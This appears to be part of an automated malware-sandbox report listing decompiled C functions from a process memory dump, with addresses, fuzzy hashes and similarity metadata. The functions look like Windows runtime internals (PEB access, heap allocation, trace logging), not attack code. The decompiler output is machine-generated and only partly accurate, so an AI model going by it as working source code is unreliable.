                        • Opcode Fuzzy Hash: 87d1f96523a19bf7bad5292e7fb8406b4db9a488a8dcfb91578f86acdc928850
                        • Instruction Fuzzy Hash: BF318E31601B08CFD726DF28C844BA7B3E5FF88714F144AADE59A87A90EB75A801CB50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 77%
                        			E02C16C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
                        				signed short* _v8;
                        				signed char _v12;
                        				void* _t22;
                        				signed char* _t23;
                        				intOrPtr _t24;
                        				signed short* _t44;
                        				void* _t47;
                        				signed char* _t56;
                        				signed char* _t58;
                        
                        				_t48 = __ecx;
                        				_push(__ecx);
                        				_push(__ecx);
                        				_t44 = __ecx;
                        				_v12 = __edx;
                        				_v8 = __ecx;
                        				_t22 = E02BB7D50();
                        				_t58 = 0x7ffe0384;
                        				if(_t22 == 0) {
                        					_t23 = 0x7ffe0384;
                        				} else {
                        					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                        				}
                        				if( *_t23 != 0) {
                        					_t24 =  *0x2c87b9c; // 0x0
                        					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
                        					_t23 = L02BB4620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
                        					_t56 = _t23;
                        					if(_t56 != 0) {
                        						_t56[0x24] = _a4;
                        						_t56[0x28] = _a8;
                        						_t56[6] = 0x1420;
                        						_t56[0x20] = _v12;
                        						_t14 =  &(_t56[0x2c]); // 0x2c
                        						E02BDF3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
                        						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
                        						if(E02BB7D50() != 0) {
                        							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                        						}
                        						_push(_t56);
                        						_push(_t47 - 0x20);
                        						_push(0x402);
                        						_push( *_t58 & 0x000000ff);
                        						E02BD9AE0();
                        						_t23 = L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
                        					}
                        				}
                        				return _t23;
                        			}












                        0x02c16c0a
                        0x02c16c0f
                        0x02c16c10
                        0x02c16c13
                        0x02c16c15
                        0x02c16c19
                        0x02c16c1c
                        0x02c16c21
                        0x02c16c28
                        0x02c16c3a
                        0x02c16c2a
                        0x02c16c33
                        0x02c16c33
                        0x02c16c3f
                        0x02c16c48
                        0x02c16c4d
                        0x02c16c60
                        0x02c16c65
                        0x02c16c69
                        0x02c16c73
                        0x02c16c79
                        0x02c16c7f
                        0x02c16c86
                        0x02c16c90
                        0x02c16c94
                        0x02c16ca6
                        0x02c16cb2
                        0x02c16cbd
                        0x02c16cbd
                        0x02c16cc3
                        0x02c16cc7
                        0x02c16ccb
                        0x02c16cd0
                        0x02c16cd1
                        0x02c16ce2
                        0x02c16ce2
                        0x02c16c69
                        0x02c16ced

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2a17d36e93f5013ecc5f78ad0b82a0831592f47ea340d0f356c72beab1311b1e
                        • Instruction ID: bb31e914620505a0a25b74d4f6d1984d74516c80cc8fa2447ee3da3391a8d544
                        • Opcode Fuzzy Hash: 2a17d36e93f5013ecc5f78ad0b82a0831592f47ea340d0f356c72beab1311b1e
                        • Instruction Fuzzy Hash: 02219CB2A00A44ABC711DB69D850F6AB7B8FF48744F1440A9F805C7791EB34ED10DBA4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 82%
                        			E02BD90AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
                        				intOrPtr* _v0;
                        				void* _v8;
                        				signed int _v12;
                        				intOrPtr _v16;
                        				char _v36;
                        				void* _t38;
                        				intOrPtr _t41;
                        				void* _t44;
                        				signed int _t45;
                        				intOrPtr* _t49;
                        				signed int _t57;
                        				signed int _t58;
                        				intOrPtr* _t59;
                        				void* _t62;
                        				void* _t63;
                        				void* _t65;
                        				void* _t66;
                        				signed int _t69;
                        				intOrPtr* _t70;
                        				void* _t71;
                        				intOrPtr* _t72;
                        				intOrPtr* _t73;
                        				char _t74;
                        
                        				_t65 = __edx;
                        				_t57 = _a4;
                        				_t32 = __ecx;
                        				_v8 = __edx;
                        				_t3 = _t32 + 0x14c; // 0x14c
                        				_t70 = _t3;
                        				_v16 = __ecx;
                        				_t72 =  *_t70;
                        				while(_t72 != _t70) {
                        					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
                        						L24:
                        						_t72 =  *_t72;
                        						continue;
                        					}
                        					_t30 = _t72 + 0x10; // 0x10
                        					if(E02BED4F0(_t30, _t65, _t57) == _t57) {
                        						return 0xb7;
                        					}
                        					_t65 = _v8;
                        					goto L24;
                        				}
                        				_t61 = _t57;
                        				_push( &_v12);
                        				_t66 = 0x10;
                        				if(E02BCE5E0(_t57, _t66) < 0) {
                        					return 0x216;
                        				}
                        				_t73 = L02BB4620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
                        				if(_t73 == 0) {
                        					_t38 = 0xe;
                        					return _t38;
                        				}
                        				_t9 = _t73 + 0x10; // 0x10
                        				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
                        				E02BDF3E0(_t9, _v8, _t57);
                        				_t41 =  *_t70;
                        				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
                        					_t62 = 3;
                        					asm("int 0x29");
                        					_push(_t62);
                        					_push(_t57);
                        					_push(_t73);
                        					_push(_t70);
                        					_t71 = _t62;
                        					_t74 = 0;
                        					_v36 = 0;
                        					_t63 = E02BCA2F0(_t62, _t71, 1, 6,  &_v36);
                        					if(_t63 == 0) {
                        						L20:
                        						_t44 = 0x57;
                        						return _t44;
                        					}
                        					_t45 = _v12;
                        					_t58 = 0x1c;
                        					if(_t45 < _t58) {
                        						goto L20;
                        					}
                        					_t69 = _t45 / _t58;
                        					if(_t69 == 0) {
                        						L19:
                        						return 0xe8;
                        					}
                        					_t59 = _v0;
                        					do {
                        						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
                        							goto L18;
                        						}
                        						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
                        						 *_t59 = _t49;
                        						if( *_t49 != 0x53445352) {
                        							goto L18;
                        						}
                        						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
                        						return 0;
                        						L18:
                        						_t63 = _t63 + 0x1c;
                        						_t74 = _t74 + 1;
                        					} while (_t74 < _t69);
                        					goto L19;
                        				}
                        				 *_t73 = _t41;
                        				 *((intOrPtr*)(_t73 + 4)) = _t70;
                        				 *((intOrPtr*)(_t41 + 4)) = _t73;
                        				 *_t70 = _t73;
                        				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
                        				return 0;
                        			}


























                        0x02bd90af
                        0x02bd90b8
                        0x02bd90bb
                        0x02bd90bf
                        0x02bd90c2
                        0x02bd90c2
                        0x02bd90c8
                        0x02bd90cb
                        0x02bd90cd
                        0x02c114d7
                        0x02c114eb
                        0x02c114eb
                        0x00000000
                        0x02c114eb
                        0x02c114db
                        0x02c114e6
                        0x00000000
                        0x02c114f2
                        0x02c114e8
                        0x00000000
                        0x02c114e8
                        0x02bd90d8
                        0x02bd90da
                        0x02bd90dd
                        0x02bd90e5
                        0x00000000
                        0x02bd9139
                        0x02bd90fa
                        0x02bd90fe
                        0x02bd9142
                        0x00000000
                        0x02bd9142
                        0x02bd9104
                        0x02bd9107
                        0x02bd910b
                        0x02bd9110
                        0x02bd9118
                        0x02bd9147
                        0x02bd9148
                        0x02bd914f
                        0x02bd9150
                        0x02bd9151
                        0x02bd9152
                        0x02bd9156
                        0x02bd915d
                        0x02bd9160
                        0x02bd9168
                        0x02bd916c
                        0x02bd91bc
                        0x02bd91be
                        0x00000000
                        0x02bd91be
                        0x02bd916e
                        0x02bd9173
                        0x02bd9176
                        0x00000000
                        0x00000000
                        0x02bd917c
                        0x02bd9180
                        0x02bd91b5
                        0x00000000
                        0x02bd91b5
                        0x02bd9182
                        0x02bd9185
                        0x02bd9189
                        0x00000000
                        0x00000000
                        0x02bd918e
                        0x02bd9190
                        0x02bd9198
                        0x00000000
                        0x00000000
                        0x02bd91a0
                        0x00000000
                        0x02bd91ad
                        0x02bd91ad
                        0x02bd91b0
                        0x02bd91b1
                        0x00000000
                        0x02bd9185
                        0x02bd911a
                        0x02bd911c
                        0x02bd911f
                        0x02bd9125
                        0x02bd9127
                        0x00000000

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                        • Instruction ID: 955a27846859369ae798b8329f238336fec8564ebd92959c9fe4cddfcd7e6e33
                        • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                        • Instruction Fuzzy Hash: 95218E71A00A05EFDB21DF59C845AAAF7F8EF44710F1488AAE949A7200E374ED40CB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 59%
                        			E02BC3B7A(void* __ecx) {
                        				signed int _v8;
                        				char _v12;
                        				intOrPtr _v20;
                        				intOrPtr _t17;
                        				intOrPtr _t26;
                        				void* _t35;
                        				void* _t38;
                        				void* _t41;
                        				intOrPtr _t44;
                        
                        				_t17 =  *0x2c884c4; // 0x0
                        				_v12 = 1;
                        				_v8 =  *0x2c884c0 * 0x4c;
                        				_t41 = __ecx;
                        				_t35 = L02BB4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x2c884c0 * 0x4c);
                        				if(_t35 == 0) {
                        					_t44 = 0xc0000017;
                        				} else {
                        					_push( &_v8);
                        					_push(_v8);
                        					_push(_t35);
                        					_push(4);
                        					_push( &_v12);
                        					_push(0x6b);
                        					_t44 = E02BDAA90();
                        					_v20 = _t44;
                        					if(_t44 >= 0) {
                        						E02BDFA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x2c884c0 * 0xc);
                        						_t38 = _t35;
                        						if(_t35 < _v8 + _t35) {
                        							do {
                        								asm("movsd");
                        								asm("movsd");
                        								asm("movsd");
                        								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
                        							} while (_t38 < _v8 + _t35);
                        							_t44 = _v20;
                        						}
                        					}
                        					_t26 =  *0x2c884c4; // 0x0
                        					L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
                        				}
                        				return _t44;
                        			}












                        0x02bc3b89
                        0x02bc3b96
                        0x02bc3ba1
                        0x02bc3bab
                        0x02bc3bb5
                        0x02bc3bb9
                        0x02c06298
                        0x02bc3bbf
                        0x02bc3bc2
                        0x02bc3bc3
                        0x02bc3bc9
                        0x02bc3bca
                        0x02bc3bcc
                        0x02bc3bcd
                        0x02bc3bd4
                        0x02bc3bd6
                        0x02bc3bdb
                        0x02bc3bea
                        0x02bc3bf7
                        0x02bc3bfb
                        0x02bc3bff
                        0x02bc3c09
                        0x02bc3c0a
                        0x02bc3c0b
                        0x02bc3c0f
                        0x02bc3c14
                        0x02bc3c18
                        0x02bc3c18
                        0x02bc3bfb
                        0x02bc3c1b
                        0x02bc3c30
                        0x02bc3c30
                        0x02bc3c3d

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 63a97cddd09e67b712e22fc95582cc2319ce08e087d6b2e480b1e15000024fa6
                        • Instruction ID: ffeb2cbd97c0decf8f71e40f943883125c86f2003cf7184b348e232042206f24
                        • Opcode Fuzzy Hash: 63a97cddd09e67b712e22fc95582cc2319ce08e087d6b2e480b1e15000024fa6
                        • Instruction Fuzzy Hash: 9E21CF73A00108AFC700DF98CD81BAEB7BEFB84308F2541A8E909AB651D771ED51CB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 80%
                        			E02C16CF0(void* __edx, intOrPtr _a4, short _a8) {
                        				char _v8;
                        				char _v12;
                        				char _v16;
                        				char _v20;
                        				char _v28;
                        				char _v36;
                        				char _v52;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				void* __ebp;
                        				signed char* _t21;
                        				void* _t24;
                        				void* _t36;
                        				void* _t38;
                        				void* _t46;
                        
                        				_push(_t36);
                        				_t46 = __edx;
                        				_v12 = 0;
                        				_v8 = 0;
                        				_v20 = 0;
                        				_v16 = 0;
                        				if(E02BB7D50() == 0) {
                        					_t21 = 0x7ffe0384;
                        				} else {
                        					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
                        				}
                        				if( *_t21 != 0) {
                        					_t21 =  *[fs:0x30];
                        					if((_t21[0x240] & 0x00000004) != 0) {
                        						if(E02BB7D50() == 0) {
                        							_t21 = 0x7ffe0385;
                        						} else {
                        							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
                        						}
                        						if(( *_t21 & 0x00000020) != 0) {
                        							_t56 = _t46;
                        							if(_t46 == 0) {
                        								_t46 = 0x2b75c80;
                        							}
                        							_push(_t46);
                        							_push( &_v12);
                        							_t24 = E02BCF6E0(_t36, 0, _t46, _t56);
                        							_push(_a4);
                        							_t38 = _t24;
                        							_push( &_v28);
                        							_t21 = E02BCF6E0(_t38, 0, _t46, _t56);
                        							if(_t38 != 0) {
                        								if(_t21 != 0) {
                        									E02C17016(_a8, 0, 0, 0,  &_v36,  &_v28);
                        									L02BB2400( &_v52);
                        								}
                        								_t21 = L02BB2400( &_v28);
                        							}
                        						}
                        					}
                        				}
                        				return _t21;
                        			}



















                        0x02c16cfb
                        0x02c16d00
                        0x02c16d02
                        0x02c16d06
                        0x02c16d0a
                        0x02c16d0e
                        0x02c16d19
                        0x02c16d2b
                        0x02c16d1b
                        0x02c16d24
                        0x02c16d24
                        0x02c16d33
                        0x02c16d39
                        0x02c16d46
                        0x02c16d4f
                        0x02c16d61
                        0x02c16d51
                        0x02c16d5a
                        0x02c16d5a
                        0x02c16d69
                        0x02c16d6b
                        0x02c16d6d
                        0x02c16d6f
                        0x02c16d6f
                        0x02c16d74
                        0x02c16d79
                        0x02c16d7a
                        0x02c16d7f
                        0x02c16d82
                        0x02c16d88
                        0x02c16d89
                        0x02c16d90
                        0x02c16d94
                        0x02c16da7
                        0x02c16db1
                        0x02c16db1
                        0x02c16dbb
                        0x02c16dbb
                        0x02c16d90
                        0x02c16d69
                        0x02c16d46
                        0x02c16dc6

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ae88b9bc2cb90c45efdf9acbc430b7471c9ed3088acf7efe97759637d5f8d23d
                        • Instruction ID: d6872cdb056d66687324a3fb546a12f54398c82e1c8ae98df962bd35c9764498
                        • Opcode Fuzzy Hash: ae88b9bc2cb90c45efdf9acbc430b7471c9ed3088acf7efe97759637d5f8d23d
                        • Instruction Fuzzy Hash: 6E21C5725043449FC711EF2AC945BA7B7EDAFC2748F1405AAFD40C7251DB34D609DAA2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 67%
                        			E02C6070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
                        				char _v8;
                        				intOrPtr _v11;
                        				signed int _v12;
                        				intOrPtr _v15;
                        				signed int _v16;
                        				intOrPtr _v28;
                        				void* __ebx;
                        				char* _t32;
                        				signed int* _t38;
                        				signed int _t60;
                        
                        				_t38 = __ecx;
                        				_v16 = __edx;
                        				_t60 = E02C607DF(__ecx, __edx,  &_a4,  &_a8, 2);
                        				if(_t60 != 0) {
                        					_t7 = _t38 + 0x38; // 0x29cd5903
                        					_push( *_t7);
                        					_t9 = _t38 + 0x34; // 0x6adeeb00
                        					_push( *_t9);
                        					_v12 = _a8 << 0xc;
                        					_t11 = _t38 + 4; // 0x5de58b5b
                        					_push(0x4000);
                        					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
                        					E02C5AFDE( &_v8,  &_v12);
                        					E02C61293(_t38, _v28, _t60);
                        					if(E02BB7D50() == 0) {
                        						_t32 = 0x7ffe0380;
                        					} else {
                        						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                        					}
                        					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                        						_t21 = _t38 + 0x3c; // 0xc3595e5f
                        						E02C514FB(_t38,  *_t21, _v11, _v15, 0xd);
                        					}
                        				}
                        				return  ~_t60;
                        			}













                        0x02c6071b
                        0x02c60724
                        0x02c60734
                        0x02c60738
                        0x02c6074b
                        0x02c6074b
                        0x02c60753
                        0x02c60753
                        0x02c60759
                        0x02c6075d
                        0x02c60774
                        0x02c60779
                        0x02c6077d
                        0x02c60789
                        0x02c60795
                        0x02c607a7
                        0x02c60797
                        0x02c607a0
                        0x02c607a0
                        0x02c607af
                        0x02c607c4
                        0x02c607cd
                        0x02c607cd
                        0x02c607af
                        0x02c607dc

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                        • Instruction ID: 0b52d33625d7861f439b2121336458464ea1129ce804a9680fdad5223c82cf39
                        • Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                        • Instruction Fuzzy Hash: 3D21D4362042049FD715DF18C888B6ABBE6FFC4750F048669F9959B385DB70DD09CB91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 96%
                        			E02BBAE73(intOrPtr __ecx, void* __edx) {
                        				intOrPtr _v8;
                        				void* _t19;
                        				char* _t22;
                        				signed char* _t24;
                        				intOrPtr _t25;
                        				intOrPtr _t27;
                        				void* _t31;
                        				intOrPtr _t36;
                        				char* _t38;
                        				signed char* _t42;
                        
                        				_push(__ecx);
                        				_t31 = __edx;
                        				_v8 = __ecx;
                        				_t19 = E02BB7D50();
                        				_t38 = 0x7ffe0384;
                        				if(_t19 != 0) {
                        					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                        				} else {
                        					_t22 = 0x7ffe0384;
                        				}
                        				_t42 = 0x7ffe0385;
                        				if( *_t22 != 0) {
                        					if(E02BB7D50() == 0) {
                        						_t24 = 0x7ffe0385;
                        					} else {
                        						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                        					}
                        					if(( *_t24 & 0x00000010) != 0) {
                        						goto L17;
                        					} else {
                        						goto L3;
                        					}
                        				} else {
                        					L3:
                        					_t27 = E02BB7D50();
                        					if(_t27 != 0) {
                        						_t27 =  *[fs:0x30];
                        						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
                        					}
                        					if( *_t38 != 0) {
                        						_t27 =  *[fs:0x30];
                        						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
                        							goto L5;
                        						}
                        						_t27 = E02BB7D50();
                        						if(_t27 != 0) {
                        							_t27 =  *[fs:0x30];
                        							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
                        						}
                        						if(( *_t42 & 0x00000020) != 0) {
                        							L17:
                        							_t25 = _v8;
                        							_t36 = 0;
                        							if(_t25 != 0) {
                        								_t36 =  *((intOrPtr*)(_t25 + 0x18));
                        							}
                        							_t27 = E02C17794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
                        						}
                        						goto L5;
                        					} else {
                        						L5:
                        						return _t27;
                        					}
                        				}
                        			}













                        0x02bbae78
                        0x02bbae7c
                        0x02bbae7e
                        0x02bbae81
                        0x02bbae86
                        0x02bbae8d
                        0x02c02691
                        0x02bbae93
                        0x02bbae93
                        0x02bbae93
                        0x02bbae98
                        0x02bbae9d
                        0x02c026a2
                        0x02c026b4
                        0x02c026a4
                        0x02c026ad
                        0x02c026ad
                        0x02c026b9
                        0x00000000
                        0x02c026bb
                        0x00000000
                        0x02c026bb
                        0x02bbaea3
                        0x02bbaea3
                        0x02bbaea3
                        0x02bbaeaa
                        0x02c026c0
                        0x02c026c9
                        0x02c026c9
                        0x02bbaeb3
                        0x02c026d4
                        0x02c026e1
                        0x00000000
                        0x00000000
                        0x02c026e7
                        0x02c026ee
                        0x02c026f0
                        0x02c026f9
                        0x02c026f9
                        0x02c02702
                        0x02c02708
                        0x02c02708
                        0x02c0270b
                        0x02c0270f
                        0x02c02711
                        0x02c02711
                        0x02c02725
                        0x02c02725
                        0x00000000
                        0x02bbaeb9
                        0x02bbaeb9
                        0x02bbaebf
                        0x02bbaebf
                        0x02bbaeb3

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                        • Instruction ID: d73c02571637f22aad65ad461c790b129fa4868a3446c03f4f60c71a407d2528
                        • Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                        • Instruction Fuzzy Hash: 8821F672A01680DFD7279B69C988B7977E9EF84754F1900E0DD048B7D2DBB4DD40CA91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 82%
                        			E02C17794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
                        				intOrPtr _v8;
                        				intOrPtr _v12;
                        				intOrPtr _t21;
                        				void* _t24;
                        				intOrPtr _t25;
                        				void* _t36;
                        				short _t39;
                        				signed char* _t42;
                        				unsigned int _t46;
                        				void* _t50;
                        
                        				_push(__ecx);
                        				_push(__ecx);
                        				_t21 =  *0x2c87b9c; // 0x0
                        				_t46 = _a8;
                        				_v12 = __edx;
                        				_v8 = __ecx;
                        				_t4 = _t46 + 0x2e; // 0x2e
                        				_t36 = _t4;
                        				_t24 = L02BB4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
                        				_t50 = _t24;
                        				if(_t50 != 0) {
                        					_t25 = _a4;
                        					if(_t25 == 5) {
                        						L3:
                        						_t39 = 0x14b1;
                        					} else {
                        						_t39 = 0x14b0;
                        						if(_t25 == 6) {
                        							goto L3;
                        						}
                        					}
                        					 *((short*)(_t50 + 6)) = _t39;
                        					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
                        					_t11 = _t50 + 0x2c; // 0x2c
                        					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
                        					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
                        					E02BDF3E0(_t11, _a12, _t46);
                        					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
                        					if(E02BB7D50() == 0) {
                        						_t42 = 0x7ffe0384;
                        					} else {
                        						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                        					}
                        					_push(_t50);
                        					_t19 = _t36 - 0x20; // 0xe
                        					_push(0x403);
                        					_push( *_t42 & 0x000000ff);
                        					E02BD9AE0();
                        					_t24 = L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
                        				}
                        				return _t24;
                        			}













                        0x02c17799
                        0x02c1779a
                        0x02c1779b
                        0x02c177a3
                        0x02c177ab
                        0x02c177ae
                        0x02c177b1
                        0x02c177b1
                        0x02c177bf
                        0x02c177c4
                        0x02c177c8
                        0x02c177ce
                        0x02c177d4
                        0x02c177e0
                        0x02c177e0
                        0x02c177d6
                        0x02c177d6
                        0x02c177de
                        0x00000000
                        0x00000000
                        0x02c177de
                        0x02c177e5
                        0x02c177f0
                        0x02c177f3
                        0x02c177f6
                        0x02c177fd
                        0x02c17800
                        0x02c1780c
                        0x02c17818
                        0x02c1782b
                        0x02c1781a
                        0x02c17823
                        0x02c17823
                        0x02c17830
                        0x02c17831
                        0x02c17838
                        0x02c1783d
                        0x02c1783e
                        0x02c1784f
                        0x02c1784f
                        0x02c1785a

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5ba5eb2d9745c5fb69071a5de748887a8119901682336643e3237469aaa20b37
                        • Instruction ID: 00741b85bc9a0ddcbadcebd99d31469e605661c4f2eb9e1b7a1547ab7ae108ba
                        • Opcode Fuzzy Hash: 5ba5eb2d9745c5fb69071a5de748887a8119901682336643e3237469aaa20b37
                        • Instruction Fuzzy Hash: 3F21A172900604ABC725DF69DC90EABB7B9EF89340F10456DF50AD7750EB34EA04CB94
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 93%
                        			E02BCFD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                        				intOrPtr _v8;
                        				void* _t19;
                        				intOrPtr _t29;
                        				intOrPtr _t32;
                        				intOrPtr _t35;
                        				intOrPtr _t37;
                        				intOrPtr* _t40;
                        
                        				_t35 = __edx;
                        				_push(__ecx);
                        				_push(__ecx);
                        				_t37 = 0;
                        				_v8 = __edx;
                        				_t29 = __ecx;
                        				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
                        					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
                        					L3:
                        					_t19 = _a4 - 4;
                        					if(_t19 != 0) {
                        						if(_t19 != 1) {
                        							L7:
                        							return _t37;
                        						}
                        						if(_t35 == 0) {
                        							L11:
                        							_t37 = 0xc000000d;
                        							goto L7;
                        						}
                        						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
                        							L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
                        							_t35 = _v8;
                        						}
                        						 *((intOrPtr*)(_t40 + 4)) = _t35;
                        						goto L7;
                        					}
                        					if(_t29 == 0) {
                        						goto L11;
                        					}
                        					_t32 =  *_t40;
                        					if(_t32 != 0) {
                        						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
                        						E02BA76E2( *_t40);
                        					}
                        					 *_t40 = _t29;
                        					goto L7;
                        				}
                        				_t40 = L02BB4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
                        				if(_t40 == 0) {
                        					_t37 = 0xc0000017;
                        					goto L7;
                        				}
                        				_t35 = _v8;
                        				 *_t40 = 0;
                        				 *((intOrPtr*)(_t40 + 4)) = 0;
                        				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
                        				goto L3;
                        			}










                        0x02bcfd9b
                        0x02bcfda0
                        0x02bcfda1
                        0x02bcfdab
                        0x02bcfdad
                        0x02bcfdb0
                        0x02bcfdb8
                        0x02bcfe0f
                        0x02bcfde6
                        0x02bcfde9
                        0x02bcfdec
                        0x02c0c0c0
                        0x02bcfdfe
                        0x02bcfe06
                        0x02bcfe06
                        0x02c0c0c8
                        0x02bcfe2d
                        0x02bcfe2d
                        0x00000000
                        0x02bcfe2d
                        0x02c0c0d1
                        0x02c0c0e0
                        0x02c0c0e5
                        0x02c0c0e5
                        0x02c0c0e8
                        0x00000000
                        0x02c0c0e8
                        0x02bcfdf4
                        0x00000000
                        0x00000000
                        0x02bcfdf6
                        0x02bcfdfa
                        0x02bcfe1a
                        0x02bcfe1f
                        0x02bcfe1f
                        0x02bcfdfc
                        0x00000000
                        0x02bcfdfc
                        0x02bcfdcc
                        0x02bcfdd0
                        0x02bcfe26
                        0x00000000
